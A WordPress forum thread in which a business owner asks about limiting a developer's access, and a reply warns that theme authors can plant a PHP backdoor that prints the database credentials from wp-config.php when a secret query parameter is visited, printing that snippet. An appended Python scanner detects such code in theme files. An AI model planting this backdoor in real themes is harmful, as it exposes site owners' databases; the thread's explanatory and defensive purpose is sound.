Word Press General question about Security



Keybler
06 Jul 2010, 09:34 AM
Hi,

I have finally given in and installed a Word Press blog for our company.

I really do not have the hours it takes to learn it all, so I would like to have a new employee that is really tech savvy and good with WP design the theme and install add-ons.

My question is about security. Since I am unfamiliar with WP, I wondered if there is any way for him to do certain things without having complete control. Or, even if he does, I would make it for a short time and then change the main admin password.

Any advice for this blog newbie from someone more experienced with this situation?

Thanks in advance
Keybler

<CrGeary.com/>
06 Jul 2010, 05:12 PM
Hey, I was thinking about this the other day. About how NOT safe it is for people to use WordPress themes without knowledge of PHP. I'm not sure if you know anything about PHP or any other coding languages, so I'll just give you an example:

WordPress, like pretty much every database-driven website, has a configuration file. WordPress's file is located at: http://www.example.com/wp-config.php (assuming you installed it to the root of your website). Once you have installed it, it will contain your username/password etc. for your database. This is my configuration file (it's for my local server, so it doesn't matter if you see it):



// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'sandbox');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', '');

/** MySQL hostname */
define('DB_HOST', 'localhost');


Now, where am I going with this? Well, if you give him access to your website via FTP (which there is no reason you should need to do), then he can look at the contents of the file.

Another thing, which is my main point and my biggest concern, would be this: if I added this code to any WordPress theme (I would have to have access to the source files of the theme, aka be the theme builder):



// planted in the theme's PHP source: a visitor who knows the query-string
// switch gets the database credentials from wp-config.php printed back
if( isset($_GET['hidden_fact']) ){
    echo DB_USER . '<br/>';
    echo DB_PASSWORD . '<br/>';
    echo DB_HOST . '<br/>';
    echo DB_NAME . '<br/>';
}


Then if you went to your website, http://www.example.com/, it looks fine: you have your new theme, it looks great, works great. But when the theme creator comes along and does this: http://www.example.com/?hidden_fact, then he/she gets your database information.

There are loads of similar things he/she could do, which is why I think if you're going to use WordPress themes, then you should know basic PHP or basic programming.


Sorry for the long post, but I felt it's important you knew about the wp-config.php file as well as the little trick.
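A defender-side check for the kind of trick described in the reply above, as an added example that is not part of the thread: a small Python scan over a theme's PHP files that flags any reference to the wp-config.php credential constants and rates it worst when the value is printed behind a request-parameter switch like ?hidden_fact. The sample theme files, including the planted functions.php, are constructed for the demo.

```python
import re

# The credential constants wp-config.php defines; nothing in a theme should
# read them, let alone print them to a visitor.
CONST_RE = re.compile(r"\b(DB_NAME|DB_USER|DB_PASSWORD|DB_HOST)\b")
OUTPUT_RE = re.compile(r"\b(echo|print|print_r|var_dump|printf)\b")
GATE_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[")  # switch like ?hidden_fact


def scan_theme_file(path, source):
    """Return (path, line_no, severity, line) findings for one PHP file.
    medium: a credential constant is referenced outside wp-config.php;
    high: it is referenced inside an output statement;
    critical: that output also sits within a few lines of a request-parameter check.
    """
    if path.endswith("wp-config.php"):
        return []  # the one file that legitimately holds them
    lines, findings = source.splitlines(), []
    for i, line in enumerate(lines, start=1):
        if not CONST_RE.search(line):
            continue
        severity = "medium"
        if OUTPUT_RE.search(line):
            severity = "high"
            if GATE_RE.search("\n".join(lines[max(0, i - 6):i])):
                severity = "critical"
        findings.append((path, i, severity, line.strip()))
    return findings


def scan_theme(files):
    """files maps relative path -> PHP source; worst findings come first."""
    rank = {"critical": 0, "high": 1, "medium": 2}
    found = [f for p, s in files.items() for f in scan_theme_file(p, s)]
    return sorted(found, key=lambda f: (rank[f[2]], f[0], f[1]))


# Constructed sample theme: the post's trick planted in functions.php, a clean
# header.php, a helper opening its own DB connection, and wp-config.php itself.
SAMPLE_THEME = {
    "functions.php": "<?php\n// planted backdoor\nif( isset($_GET['hidden_fact']) ){\n"
                     "    echo DB_USER . '<br/>';\n    echo DB_PASSWORD . '<br/>';\n"
                     "    echo DB_HOST . '<br/>';\n    echo DB_NAME . '<br/>';\n}\n",
    "header.php": "<?php wp_head(); ?>\n<title><?php bloginfo('name'); ?></title>\n",
    "inc/stats.php": "<?php\n$db = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);\n",
    "wp-config.php": "<?php\ndefine('DB_NAME', 'sandbox');\ndefine('DB_PASSWORD', '');\n",
}

if __name__ == "__main__":
    for path, n, sev, text in scan_theme(SAMPLE_THEME):
        print(f"{sev:8} {path}:{n}  {text}")
```

Run it against a real theme by reading each .php file under the theme directory into the dict; a clean theme produces no findings at all, since only wp-config.php should ever touch those constants.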